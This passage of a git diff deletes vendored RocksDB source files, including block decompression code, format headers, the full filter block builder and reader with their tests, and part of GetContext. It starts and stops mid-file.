-          "LZ4 not supported or corrupted LZ4 compressed block contents";
-        return Status::Corruption(lz4_corrupt_msg);
-      }
-      *contents =
-          BlockContents(std::move(ubuf), decompress_size, true, kNoCompression);
-      break;
-    case kLZ4HCCompression:
-      ubuf.reset(LZ4_Uncompress(
-          data, n, &decompress_size,
-          GetCompressFormatForVersion(kLZ4HCCompression, format_version),
-          compression_dict));
-      if (!ubuf) {
-        static char lz4hc_corrupt_msg[] =
-          "LZ4HC not supported or corrupted LZ4HC compressed block contents";
-        return Status::Corruption(lz4hc_corrupt_msg);
-      }
-      *contents =
-          BlockContents(std::move(ubuf), decompress_size, true, kNoCompression);
-      break;
-    case kXpressCompression:
-      ubuf.reset(XPRESS_Uncompress(data, n, &decompress_size));
-      if (!ubuf) {
-        static char xpress_corrupt_msg[] =
-          "XPRESS not supported or corrupted XPRESS compressed block contents";
-        return Status::Corruption(xpress_corrupt_msg);
-      }
-      *contents =
-        BlockContents(std::move(ubuf), decompress_size, true, kNoCompression);
-      break;
-    case kZSTD:
-    case kZSTDNotFinalCompression:
-      ubuf.reset(ZSTD_Uncompress(data, n, &decompress_size, compression_dict));
-      if (!ubuf) {
-        static char zstd_corrupt_msg[] =
-            "ZSTD not supported or corrupted ZSTD compressed block contents";
-        return Status::Corruption(zstd_corrupt_msg);
-      }
-      *contents =
-          BlockContents(std::move(ubuf), decompress_size, true, kNoCompression);
-      break;
-    default:
-      return Status::Corruption("bad block type");
-  }
-
-  if(ShouldReportDetailedTime(ioptions.env, ioptions.statistics)){
-    MeasureTime(ioptions.statistics, DECOMPRESSION_TIMES_NANOS,
-      timer.ElapsedNanos());
-    MeasureTime(ioptions.statistics, BYTES_DECOMPRESSED, contents->data.size());
-    RecordTick(ioptions.statistics, NUMBER_BLOCK_DECOMPRESSED);
-  }
-
-  return Status::OK();
-}
-
-//
-// The 'data' points to the raw block contents that was read in from file.
-// This method allocates a new heap buffer and the raw block
-// contents are uncompresed into this buffer. This
-// buffer is returned via 'result' and it is upto the caller to
-// free this buffer.
-// format_version is the block format as defined in include/rocksdb/table.h
-Status UncompressBlockContents(const char* data, size_t n,
-                               BlockContents* contents, uint32_t format_version,
-                               const Slice& compression_dict,
-                               const ImmutableCFOptions &ioptions) {
-  assert(data[n] != kNoCompression);
-  return UncompressBlockContentsForCompressionType(
-      data, n, contents, format_version, compression_dict,
-      (CompressionType)data[n], ioptions);
-}
-
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/table/format.h b/thirdparty/rocksdb/table/format.h
deleted file mode 100644
index 512b4a3..0000000
--- a/thirdparty/rocksdb/table/format.h
+++ /dev/null
@@ -1,258 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-#pragma once
-#include <string>
-#include <stdint.h>
-#include "rocksdb/slice.h"
-#include "rocksdb/status.h"
-#include "rocksdb/options.h"
-#include "rocksdb/table.h"
-
-#include "options/cf_options.h"
-#include "port/port.h"  // noexcept
-#include "table/persistent_cache_options.h"
-#include "util/file_reader_writer.h"
-
-namespace rocksdb {
-
-class Block;
-class RandomAccessFile;
-struct ReadOptions;
-
-extern bool ShouldReportDetailedTime(Env* env, Statistics* stats);
-
-// the length of the magic number in bytes.
-const int kMagicNumberLengthByte = 8;
-
-// BlockHandle is a pointer to the extent of a file that stores a data
-// block or a meta block.
-class BlockHandle {
- public:
-  BlockHandle();
-  BlockHandle(uint64_t offset, uint64_t size);
-
-  // The offset of the block in the file.
-  uint64_t offset() const { return offset_; }
-  void set_offset(uint64_t _offset) { offset_ = _offset; }
-
-  // The size of the stored block
-  uint64_t size() const { return size_; }
-  void set_size(uint64_t _size) { size_ = _size; }
-
-  void EncodeTo(std::string* dst) const;
-  Status DecodeFrom(Slice* input);
-
-  // Return a string that contains the copy of handle.
-  std::string ToString(bool hex = true) const;
-
-  // if the block handle's offset and size are both "0", we will view it
-  // as a null block handle that points to no where.
-  bool IsNull() const {
-    return offset_ == 0 && size_ == 0;
-  }
-
-  static const BlockHandle& NullBlockHandle() {
-    return kNullBlockHandle;
-  }
-
-  // Maximum encoding length of a BlockHandle
-  enum { kMaxEncodedLength = 10 + 10 };
-
- private:
-  uint64_t offset_;
-  uint64_t size_;
-
-  static const BlockHandle kNullBlockHandle;
-};
-
-inline uint32_t GetCompressFormatForVersion(CompressionType compression_type,
-                                            uint32_t version) {
-  // snappy is not versioned
-  assert(compression_type != kSnappyCompression &&
-         compression_type != kXpressCompression &&
-         compression_type != kNoCompression);
-  // As of version 2, we encode compressed block with
-  // compress_format_version == 2. Before that, the version is 1.
-  // DO NOT CHANGE THIS FUNCTION, it affects disk format
-  return version >= 2 ? 2 : 1;
-}
-
-inline bool BlockBasedTableSupportedVersion(uint32_t version) {
-  return version <= 2;
-}
-
-// Footer encapsulates the fixed information stored at the tail
-// end of every table file.
-class Footer {
- public:
-  // Constructs a footer without specifying its table magic number.
-  // In such case, the table magic number of such footer should be
-  // initialized via @ReadFooterFromFile().
-  // Use this when you plan to load Footer with DecodeFrom(). Never use this
-  // when you plan to EncodeTo.
-  Footer() : Footer(kInvalidTableMagicNumber, 0) {}
-
-  // Use this constructor when you plan to write out the footer using
-  // EncodeTo(). Never use this constructor with DecodeFrom().
-  Footer(uint64_t table_magic_number, uint32_t version);
-
-  // The version of the footer in this file
-  uint32_t version() const { return version_; }
-
-  // The checksum type used in this file
-  ChecksumType checksum() const { return checksum_; }
-  void set_checksum(const ChecksumType c) { checksum_ = c; }
-
-  // The block handle for the metaindex block of the table
-  const BlockHandle& metaindex_handle() const { return metaindex_handle_; }
-  void set_metaindex_handle(const BlockHandle& h) { metaindex_handle_ = h; }
-
-  // The block handle for the index block of the table
-  const BlockHandle& index_handle() const { return index_handle_; }
-
-  void set_index_handle(const BlockHandle& h) { index_handle_ = h; }
-
-  uint64_t table_magic_number() const { return table_magic_number_; }
-
-  void EncodeTo(std::string* dst) const;
-
-  // Set the current footer based on the input slice.
-  //
-  // REQUIRES: table_magic_number_ is not set (i.e.,
-  // HasInitializedTableMagicNumber() is true). The function will initialize the
-  // magic number
-  Status DecodeFrom(Slice* input);
-
-  // Encoded length of a Footer.  Note that the serialization of a Footer will
-  // always occupy at least kMinEncodedLength bytes.  If fields are changed
-  // the version number should be incremented and kMaxEncodedLength should be
-  // increased accordingly.
-  enum {
-    // Footer version 0 (legacy) will always occupy exactly this many bytes.
-    // It consists of two block handles, padding, and a magic number.
-    kVersion0EncodedLength = 2 * BlockHandle::kMaxEncodedLength + 8,
-    // Footer of versions 1 and higher will always occupy exactly this many
-    // bytes. It consists of the checksum type, two block handles, padding,
-    // a version number (bigger than 1), and a magic number
-    kNewVersionsEncodedLength = 1 + 2 * BlockHandle::kMaxEncodedLength + 4 + 8,
-    kMinEncodedLength = kVersion0EncodedLength,
-    kMaxEncodedLength = kNewVersionsEncodedLength,
-  };
-
-  static const uint64_t kInvalidTableMagicNumber = 0;
-
-  // convert this object to a human readable form
-  std::string ToString() const;
-
- private:
-  // REQUIRES: magic number wasn't initialized.
-  void set_table_magic_number(uint64_t magic_number) {
-    assert(!HasInitializedTableMagicNumber());
-    table_magic_number_ = magic_number;
-  }
-
-  // return true if @table_magic_number_ is set to a value different
-  // from @kInvalidTableMagicNumber.
-  bool HasInitializedTableMagicNumber() const {
-    return (table_magic_number_ != kInvalidTableMagicNumber);
-  }
-
-  uint32_t version_;
-  ChecksumType checksum_;
-  BlockHandle metaindex_handle_;
-  BlockHandle index_handle_;
-  uint64_t table_magic_number_ = 0;
-};
-
-// Read the footer from file
-// If enforce_table_magic_number != 0, ReadFooterFromFile() will return
-// corruption if table_magic number is not equal to enforce_table_magic_number
-Status ReadFooterFromFile(RandomAccessFileReader* file,
-                          FilePrefetchBuffer* prefetch_buffer,
-                          uint64_t file_size, Footer* footer,
-                          uint64_t enforce_table_magic_number = 0);
-
-// 1-byte type + 32-bit crc
-static const size_t kBlockTrailerSize = 5;
-
-struct BlockContents {
-  Slice data;           // Actual contents of data
-  bool cachable;        // True iff data can be cached
-  CompressionType compression_type;
-  std::unique_ptr<char[]> allocation;
-
-  BlockContents() : cachable(false), compression_type(kNoCompression) {}
-
-  BlockContents(const Slice& _data, bool _cachable,
-                CompressionType _compression_type)
-      : data(_data), cachable(_cachable), compression_type(_compression_type) {}
-
-  BlockContents(std::unique_ptr<char[]>&& _data, size_t _size, bool _cachable,
-                CompressionType _compression_type)
-      : data(_data.get(), _size),
-        cachable(_cachable),
-        compression_type(_compression_type),
-        allocation(std::move(_data)) {}
-
-  BlockContents(BlockContents&& other) ROCKSDB_NOEXCEPT { *this = std::move(other); }
-
-  BlockContents& operator=(BlockContents&& other) {
-    data = std::move(other.data);
-    cachable = other.cachable;
-    compression_type = other.compression_type;
-    allocation = std::move(other.allocation);
-    return *this;
-  }
-};
-
-// Read the block identified by "handle" from "file".  On failure
-// return non-OK.  On success fill *result and return OK.
-extern Status ReadBlockContents(
-    RandomAccessFileReader* file, FilePrefetchBuffer* prefetch_buffer,
-    const Footer& footer, const ReadOptions& options, const BlockHandle& handle,
-    BlockContents* contents, const ImmutableCFOptions& ioptions,
-    bool do_uncompress = true, const Slice& compression_dict = Slice(),
-    const PersistentCacheOptions& cache_options = PersistentCacheOptions());
-
-// The 'data' points to the raw block contents read in from file.
-// This method allocates a new heap buffer and the raw block
-// contents are uncompresed into this buffer. This buffer is
-// returned via 'result' and it is upto the caller to
-// free this buffer.
-// For description of compress_format_version and possible values, see
-// util/compression.h
-extern Status UncompressBlockContents(const char* data, size_t n,
-                                      BlockContents* contents,
-                                      uint32_t compress_format_version,
-                                      const Slice& compression_dict,
-                                      const ImmutableCFOptions &ioptions);
-
-// This is an extension to UncompressBlockContents that accepts
-// a specific compression type. This is used by un-wrapped blocks
-// with no compression header.
-extern Status UncompressBlockContentsForCompressionType(
-    const char* data, size_t n, BlockContents* contents,
-    uint32_t compress_format_version, const Slice& compression_dict,
-    CompressionType compression_type, const ImmutableCFOptions &ioptions);
-
-// Implementation details follow.  Clients should ignore,
-
-// TODO(andrewkr): we should prefer one way of representing a null/uninitialized
-// BlockHandle. Currently we use zeros for null and use negation-of-zeros for
-// uninitialized.
-inline BlockHandle::BlockHandle()
-    : BlockHandle(~static_cast<uint64_t>(0),
-                  ~static_cast<uint64_t>(0)) {
-}
-
-inline BlockHandle::BlockHandle(uint64_t _offset, uint64_t _size)
-    : offset_(_offset), size_(_size) {}
-
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/table/full_filter_bits_builder.h b/thirdparty/rocksdb/table/full_filter_bits_builder.h
deleted file mode 100644
index b3be7e8..0000000
--- a/thirdparty/rocksdb/table/full_filter_bits_builder.h
+++ /dev/null
@@ -1,73 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-// Copyright (c) 2012 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-#pragma once
-
-#include <memory>
-#include <string>
-#include <vector>
-
-#include "rocksdb/filter_policy.h"
-
-namespace rocksdb {
-
-class Slice;
-
-class FullFilterBitsBuilder : public FilterBitsBuilder {
- public:
-  explicit FullFilterBitsBuilder(const size_t bits_per_key,
-                                 const size_t num_probes);
-
-  ~FullFilterBitsBuilder();
-
-  virtual void AddKey(const Slice& key) override;
-
-  // Create a filter that for hashes [0, n-1], the filter is allocated here
-  // When creating filter, it is ensured that
-  // total_bits = num_lines * CACHE_LINE_SIZE * 8
-  // dst len is >= 5, 1 for num_probes, 4 for num_lines
-  // Then total_bits = (len - 5) * 8, and cache_line_size could be calculated
-  // +----------------------------------------------------------------+
-  // |              filter data with length total_bits/8              |
-  // +----------------------------------------------------------------+
-  // |                                                                |
-  // | ...                                                            |
-  // |                                                                |
-  // +----------------------------------------------------------------+
-  // | ...                | num_probes : 1 byte | num_lines : 4 bytes |
-  // +----------------------------------------------------------------+
-  virtual Slice Finish(std::unique_ptr<const char[]>* buf) override;
-
-  // Calculate num of entries fit into a space.
-  virtual int CalculateNumEntry(const uint32_t space) override;
-
-  // Calculate space for new filter. This is reverse of CalculateNumEntry.
-  uint32_t CalculateSpace(const int num_entry, uint32_t* total_bits,
-                          uint32_t* num_lines);
-
- private:
-  size_t bits_per_key_;
-  size_t num_probes_;
-  std::vector<uint32_t> hash_entries_;
-
-  // Get totalbits that optimized for cpu cache line
-  uint32_t GetTotalBitsForLocality(uint32_t total_bits);
-
-  // Reserve space for new filter
-  char* ReserveSpace(const int num_entry, uint32_t* total_bits,
-                     uint32_t* num_lines);
-
-  // Assuming single threaded access to this function.
-  void AddHash(uint32_t h, char* data, uint32_t num_lines, uint32_t total_bits);
-
-  // No Copy allowed
-  FullFilterBitsBuilder(const FullFilterBitsBuilder&);
-  void operator=(const FullFilterBitsBuilder&);
-};
-
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/table/full_filter_block.cc b/thirdparty/rocksdb/table/full_filter_block.cc
deleted file mode 100644
index 5739494..0000000
--- a/thirdparty/rocksdb/table/full_filter_block.cc
+++ /dev/null
@@ -1,113 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#include "table/full_filter_block.h"
-
-#include "monitoring/perf_context_imp.h"
-#include "port/port.h"
-#include "rocksdb/filter_policy.h"
-#include "util/coding.h"
-
-namespace rocksdb {
-
-FullFilterBlockBuilder::FullFilterBlockBuilder(
-    const SliceTransform* prefix_extractor, bool whole_key_filtering,
-    FilterBitsBuilder* filter_bits_builder)
-    : prefix_extractor_(prefix_extractor),
-      whole_key_filtering_(whole_key_filtering),
-      num_added_(0) {
-  assert(filter_bits_builder != nullptr);
-  filter_bits_builder_.reset(filter_bits_builder);
-}
-
-void FullFilterBlockBuilder::Add(const Slice& key) {
-  if (whole_key_filtering_) {
-    AddKey(key);
-  }
-  if (prefix_extractor_ && prefix_extractor_->InDomain(key)) {
-    AddPrefix(key);
-  }
-}
-
-// Add key to filter if needed
-inline void FullFilterBlockBuilder::AddKey(const Slice& key) {
-  filter_bits_builder_->AddKey(key);
-  num_added_++;
-}
-
-// Add prefix to filter if needed
-inline void FullFilterBlockBuilder::AddPrefix(const Slice& key) {
-  Slice prefix = prefix_extractor_->Transform(key);
-  AddKey(prefix);
-}
-
-Slice FullFilterBlockBuilder::Finish(const BlockHandle& tmp, Status* status) {
-  // In this impl we ignore BlockHandle
-  *status = Status::OK();
-  if (num_added_ != 0) {
-    num_added_ = 0;
-    return filter_bits_builder_->Finish(&filter_data_);
-  }
-  return Slice();
-}
-
-FullFilterBlockReader::FullFilterBlockReader(
-    const SliceTransform* prefix_extractor, bool _whole_key_filtering,
-    const Slice& contents, FilterBitsReader* filter_bits_reader,
-    Statistics* stats)
-    : FilterBlockReader(contents.size(), stats, _whole_key_filtering),
-      prefix_extractor_(prefix_extractor),
-      contents_(contents) {
-  assert(filter_bits_reader != nullptr);
-  filter_bits_reader_.reset(filter_bits_reader);
-}
-
-FullFilterBlockReader::FullFilterBlockReader(
-    const SliceTransform* prefix_extractor, bool _whole_key_filtering,
-    BlockContents&& contents, FilterBitsReader* filter_bits_reader,
-    Statistics* stats)
-    : FullFilterBlockReader(prefix_extractor, _whole_key_filtering,
-                            contents.data, filter_bits_reader, stats) {
-  block_contents_ = std::move(contents);
-}
-
-bool FullFilterBlockReader::KeyMayMatch(const Slice& key, uint64_t block_offset,
-                                        const bool no_io,
-                                        const Slice* const const_ikey_ptr) {
-  assert(block_offset == kNotValid);
-  if (!whole_key_filtering_) {
-    return true;
-  }
-  return MayMatch(key);
-}
-
-bool FullFilterBlockReader::PrefixMayMatch(const Slice& prefix,
-                                           uint64_t block_offset,
-                                           const bool no_io,
-                                           const Slice* const const_ikey_ptr) {
-  assert(block_offset == kNotValid);
-  if (!prefix_extractor_) {
-    return true;
-  }
-  return MayMatch(prefix);
-}
-
-bool FullFilterBlockReader::MayMatch(const Slice& entry) {
-  if (contents_.size() != 0)  {
-    if (filter_bits_reader_->MayMatch(entry)) {
-      PERF_COUNTER_ADD(bloom_sst_hit_count, 1);
-      return true;
-    } else {
-      PERF_COUNTER_ADD(bloom_sst_miss_count, 1);
-      return false;
-    }
-  }
-  return true;  // remain the same with block_based filter
-}
-
-size_t FullFilterBlockReader::ApproximateMemoryUsage() const {
-  return contents_.size();
-}
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/table/full_filter_block.h b/thirdparty/rocksdb/table/full_filter_block.h
deleted file mode 100644
index be27c58..0000000
--- a/thirdparty/rocksdb/table/full_filter_block.h
+++ /dev/null
@@ -1,117 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#pragma once
-
-#include <stddef.h>
-#include <stdint.h>
-#include <memory>
-#include <string>
-#include <vector>
-#include "rocksdb/options.h"
-#include "rocksdb/slice.h"
-#include "rocksdb/slice_transform.h"
-#include "db/dbformat.h"
-#include "util/hash.h"
-#include "table/filter_block.h"
-
-namespace rocksdb {
-
-class FilterPolicy;
-class FilterBitsBuilder;
-class FilterBitsReader;
-
-// A FullFilterBlockBuilder is used to construct a full filter for a
-// particular Table.  It generates a single string which is stored as
-// a special block in the Table.
-// The format of full filter block is:
-// +----------------------------------------------------------------+
-// |              full filter for all keys in sst file              |
-// +----------------------------------------------------------------+
-// The full filter can be very large. At the end of it, we put
-// num_probes: how many hash functions are used in bloom filter
-//
-class FullFilterBlockBuilder : public FilterBlockBuilder {
- public:
-  explicit FullFilterBlockBuilder(const SliceTransform* prefix_extractor,
-                                  bool whole_key_filtering,
-                                  FilterBitsBuilder* filter_bits_builder);
-  // bits_builder is created in filter_policy, it should be passed in here
-  // directly. and be deleted here
-  ~FullFilterBlockBuilder() {}
-
-  virtual bool IsBlockBased() override { return false; }
-  virtual void StartBlock(uint64_t block_offset) override {}
-  virtual void Add(const Slice& key) override;
-  virtual Slice Finish(const BlockHandle& tmp, Status* status) override;
-  using FilterBlockBuilder::Finish;
-
- protected:
-  virtual void AddKey(const Slice& key);
-  std::unique_ptr<FilterBitsBuilder> filter_bits_builder_;
-
- private:
-  // important: all of these might point to invalid addresses
-  // at the time of destruction of this filter block. destructor
-  // should NOT dereference them.
-  const SliceTransform* prefix_extractor_;
-  bool whole_key_filtering_;
-
-  uint32_t num_added_;
-  std::unique_ptr<const char[]> filter_data_;
-
-  void AddPrefix(const Slice& key);
-
-  // No copying allowed
-  FullFilterBlockBuilder(const FullFilterBlockBuilder&);
-  void operator=(const FullFilterBlockBuilder&);
-};
-
-// A FilterBlockReader is used to parse filter from SST table.
-// KeyMayMatch and PrefixMayMatch would trigger filter checking
-class FullFilterBlockReader : public FilterBlockReader {
- public:
-  // REQUIRES: "contents" and filter_bits_reader must stay live
-  // while *this is live.
-  explicit FullFilterBlockReader(const SliceTransform* prefix_extractor,
-                                 bool whole_key_filtering,
-                                 const Slice& contents,
-                                 FilterBitsReader* filter_bits_reader,
-                                 Statistics* statistics);
-  explicit FullFilterBlockReader(const SliceTransform* prefix_extractor,
-                                 bool whole_key_filtering,
-                                 BlockContents&& contents,
-                                 FilterBitsReader* filter_bits_reader,
-                                 Statistics* statistics);
-
-  // bits_reader is created in filter_policy, it should be passed in here
-  // directly. and be deleted here
-  ~FullFilterBlockReader() {}
-
-  virtual bool IsBlockBased() override { return false; }
-  virtual bool KeyMayMatch(
-      const Slice& key, uint64_t block_offset = kNotValid,
-      const bool no_io = false,
-      const Slice* const const_ikey_ptr = nullptr) override;
-  virtual bool PrefixMayMatch(
-      const Slice& prefix, uint64_t block_offset = kNotValid,
-      const bool no_io = false,
-      const Slice* const const_ikey_ptr = nullptr) override;
-  virtual size_t ApproximateMemoryUsage() const override;
-
- private:
-  const SliceTransform* prefix_extractor_;
-  Slice contents_;
-  std::unique_ptr<FilterBitsReader> filter_bits_reader_;
-  BlockContents block_contents_;
-  std::unique_ptr<const char[]> filter_data_;
-
-  // No copying allowed
-  FullFilterBlockReader(const FullFilterBlockReader&);
-  bool MayMatch(const Slice& entry);
-  void operator=(const FullFilterBlockReader&);
-};
-
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/table/full_filter_block_test.cc b/thirdparty/rocksdb/table/full_filter_block_test.cc
deleted file mode 100644
index 5fbda4c..0000000
--- a/thirdparty/rocksdb/table/full_filter_block_test.cc
+++ /dev/null
@@ -1,189 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#include "table/full_filter_block.h"
-
-#include "rocksdb/filter_policy.h"
-#include "util/coding.h"
-#include "util/hash.h"
-#include "util/string_util.h"
-#include "util/testharness.h"
-#include "util/testutil.h"
-
-namespace rocksdb {
-
-class TestFilterBitsBuilder : public FilterBitsBuilder {
- public:
-  explicit TestFilterBitsBuilder() {}
-
-  // Add Key to filter
-  virtual void AddKey(const Slice& key) override {
-    hash_entries_.push_back(Hash(key.data(), key.size(), 1));
-  }
-
-  // Generate the filter using the keys that are added
-  virtual Slice Finish(std::unique_ptr<const char[]>* buf) override {
-    uint32_t len = static_cast<uint32_t>(hash_entries_.size()) * 4;
-    char* data = new char[len];
-    for (size_t i = 0; i < hash_entries_.size(); i++) {
-      EncodeFixed32(data + i * 4, hash_entries_[i]);
-    }
-    const char* const_data = data;
-    buf->reset(const_data);
-    return Slice(data, len);
-  }
-
- private:
-  std::vector<uint32_t> hash_entries_;
-};
-
-class TestFilterBitsReader : public FilterBitsReader {
- public:
-  explicit TestFilterBitsReader(const Slice& contents)
-      : data_(contents.data()), len_(static_cast<uint32_t>(contents.size())) {}
-
-  virtual bool MayMatch(const Slice& entry) override {
-    uint32_t h = Hash(entry.data(), entry.size(), 1);
-    for (size_t i = 0; i + 4 <= len_; i += 4) {
-      if (h == DecodeFixed32(data_ + i)) {
-        return true;
-      }
-    }
-    return false;
-  }
-
- private:
-  const char* data_;
-  uint32_t len_;
-};
-
-
-class TestHashFilter : public FilterPolicy {
- public:
-  virtual const char* Name() const override { return "TestHashFilter"; }
-
-  virtual void CreateFilter(const Slice* keys, int n,
-                            std::string* dst) const override {
-    for (int i = 0; i < n; i++) {
-      uint32_t h = Hash(keys[i].data(), keys[i].size(), 1);
-      PutFixed32(dst, h);
-    }
-  }
-
-  virtual bool KeyMayMatch(const Slice& key,
-                           const Slice& filter) const override {
-    uint32_t h = Hash(key.data(), key.size(), 1);
-    for (unsigned int i = 0; i + 4 <= filter.size(); i += 4) {
-      if (h == DecodeFixed32(filter.data() + i)) {
-        return true;
-      }
-    }
-    return false;
-  }
-
-  virtual FilterBitsBuilder* GetFilterBitsBuilder() const override {
-    return new TestFilterBitsBuilder();
-  }
-
-  virtual FilterBitsReader* GetFilterBitsReader(const Slice& contents)
-      const override {
-    return new TestFilterBitsReader(contents);
-  }
-};
-
-class PluginFullFilterBlockTest : public testing::Test {
- public:
-  BlockBasedTableOptions table_options_;
-
-  PluginFullFilterBlockTest() {
-    table_options_.filter_policy.reset(new TestHashFilter());
-  }
-};
-
-TEST_F(PluginFullFilterBlockTest, PluginEmptyBuilder) {
-  FullFilterBlockBuilder builder(
-      nullptr, true, table_options_.filter_policy->GetFilterBitsBuilder());
-  Slice block = builder.Finish();
-  ASSERT_EQ("", EscapeString(block));
-
-  FullFilterBlockReader reader(
-      nullptr, true, block,
-      table_options_.filter_policy->GetFilterBitsReader(block), nullptr);
-  // Remain same symantic with blockbased filter
-  ASSERT_TRUE(reader.KeyMayMatch("foo"));
-}
-
-TEST_F(PluginFullFilterBlockTest, PluginSingleChunk) {
-  FullFilterBlockBuilder builder(
-      nullptr, true, table_options_.filter_policy->GetFilterBitsBuilder());
-  builder.Add("foo");
-  builder.Add("bar");
-  builder.Add("box");
-  builder.Add("box");
-  builder.Add("hello");
-  Slice block = builder.Finish();
-  FullFilterBlockReader reader(
-      nullptr, true, block,
-      table_options_.filter_policy->GetFilterBitsReader(block), nullptr);
-  ASSERT_TRUE(reader.KeyMayMatch("foo"));
-  ASSERT_TRUE(reader.KeyMayMatch("bar"));
-  ASSERT_TRUE(reader.KeyMayMatch("box"));
-  ASSERT_TRUE(reader.KeyMayMatch("hello"));
-  ASSERT_TRUE(reader.KeyMayMatch("foo"));
-  ASSERT_TRUE(!reader.KeyMayMatch("missing"));
-  ASSERT_TRUE(!reader.KeyMayMatch("other"));
-}
-
-class FullFilterBlockTest : public testing::Test {
- public:
-  BlockBasedTableOptions table_options_;
-
-  FullFilterBlockTest() {
-    table_options_.filter_policy.reset(NewBloomFilterPolicy(10, false));
-  }
-
-  ~FullFilterBlockTest() {}
-};
-
-TEST_F(FullFilterBlockTest, EmptyBuilder) {
-  FullFilterBlockBuilder builder(
-      nullptr, true, table_options_.filter_policy->GetFilterBitsBuilder());
-  Slice block = builder.Finish();
-  ASSERT_EQ("", EscapeString(block));
-
-  FullFilterBlockReader reader(
-      nullptr, true, block,
-      table_options_.filter_policy->GetFilterBitsReader(block), nullptr);
-  // Remain same symantic with blockbased filter
-  ASSERT_TRUE(reader.KeyMayMatch("foo"));
-}
-
-TEST_F(FullFilterBlockTest, SingleChunk) {
-  FullFilterBlockBuilder builder(
-      nullptr, true, table_options_.filter_policy->GetFilterBitsBuilder());
-  builder.Add("foo");
-  builder.Add("bar");
-  builder.Add("box");
-  builder.Add("box");
-  builder.Add("hello");
-  Slice block = builder.Finish();
-  FullFilterBlockReader reader(
-      nullptr, true, block,
-      table_options_.filter_policy->GetFilterBitsReader(block), nullptr);
-  ASSERT_TRUE(reader.KeyMayMatch("foo"));
-  ASSERT_TRUE(reader.KeyMayMatch("bar"));
-  ASSERT_TRUE(reader.KeyMayMatch("box"));
-  ASSERT_TRUE(reader.KeyMayMatch("hello"));
-  ASSERT_TRUE(reader.KeyMayMatch("foo"));
-  ASSERT_TRUE(!reader.KeyMayMatch("missing"));
-  ASSERT_TRUE(!reader.KeyMayMatch("other"));
-}
-
-}  // namespace rocksdb
-
-int main(int argc, char** argv) {
-  ::testing::InitGoogleTest(&argc, argv);
-  return RUN_ALL_TESTS();
-}
diff --git a/thirdparty/rocksdb/table/get_context.cc b/thirdparty/rocksdb/table/get_context.cc
deleted file mode 100644
index 258891e..0000000
--- a/thirdparty/rocksdb/table/get_context.cc
+++ /dev/null
@@ -1,213 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#include "table/get_context.h"
-#include "db/merge_helper.h"
-#include "db/pinned_iterators_manager.h"
-#include "monitoring/file_read_sample.h"
-#include "monitoring/perf_context_imp.h"
-#include "monitoring/statistics.h"
-#include "rocksdb/env.h"
-#include "rocksdb/merge_operator.h"
-#include "rocksdb/statistics.h"
-
-namespace rocksdb {
-
-namespace {
-
-void appendToReplayLog(std::string* replay_log, ValueType type, Slice value) {
-#ifndef ROCKSDB_LITE
-  if (replay_log) {
-    if (replay_log->empty()) {
-      // Optimization: in the common case of only one operation in the
-      // log, we allocate the exact amount of space needed.
-      replay_log->reserve(1 + VarintLength(value.size()) + value.size());
-    }
-    replay_log->push_back(type);
-    PutLengthPrefixedSlice(replay_log, value);
-  }
-#endif  // ROCKSDB_LITE
-}
-
-}  // namespace
-
-GetContext::GetContext(
-    const Comparator* ucmp, const MergeOperator* merge_operator, Logger* logger,
-    Statistics* statistics, GetState init_state, const Slice& user_key,
-    PinnableSlice* pinnable_val, bool* value_found, MergeContext* merge_context,
-    RangeDelAggregator* _range_del_agg, Env* env, SequenceNumber* seq,
-    PinnedIteratorsManager* _pinned_iters_mgr, bool* is_blob_index)
-    : ucmp_(ucmp),
-      merge_operator_(merge_operator),
-      logger_(logger),
-      statistics_(statistics),
-      state_(init_state),
-      user_key_(user_key),
-      pinnable_val_(pinnable_val),
-      value_found_(value_found),
-      merge_context_(merge_context),
-      range_del_agg_(_range_del_agg),
-      env_(env),
-      seq_(seq),
-      replay_log_(nullptr),
-      pinned_iters_mgr_(_pinned_iters_mgr),
-      is_blob_index_(is_blob_index) {
-  if (seq_) {
-    *seq_ = kMaxSequenceNumber;
-  }
-  sample_ = should_sample_file_read();
-}
-
-// Called from TableCache::Get and Table::Get when file/block in which
-// key may exist are not there in TableCache/BlockCache respectively. In this
-// case we can't guarantee that key does not exist and are not permitted to do
-// IO to be certain.Set the status=kFound and value_found=false to let the
-// caller know that key may exist but is not there in memory
-void GetContext::MarkKeyMayExist() {
-  state_ = kFound;
-  if (value_found_ != nullptr) {
-    *value_found_ = false;
-  }
-}
-
-void GetContext::SaveValue(const Slice& value, SequenceNumber seq) {
-  assert(state_ == kNotFound);
-  appendToReplayLog(replay_log_, kTypeValue, value);
-
-  state_ = kFound;
-  if (LIKELY(pinnable_val_ != nullptr)) {
-    pinnable_val_->PinSelf(value);
-  }
-}
-
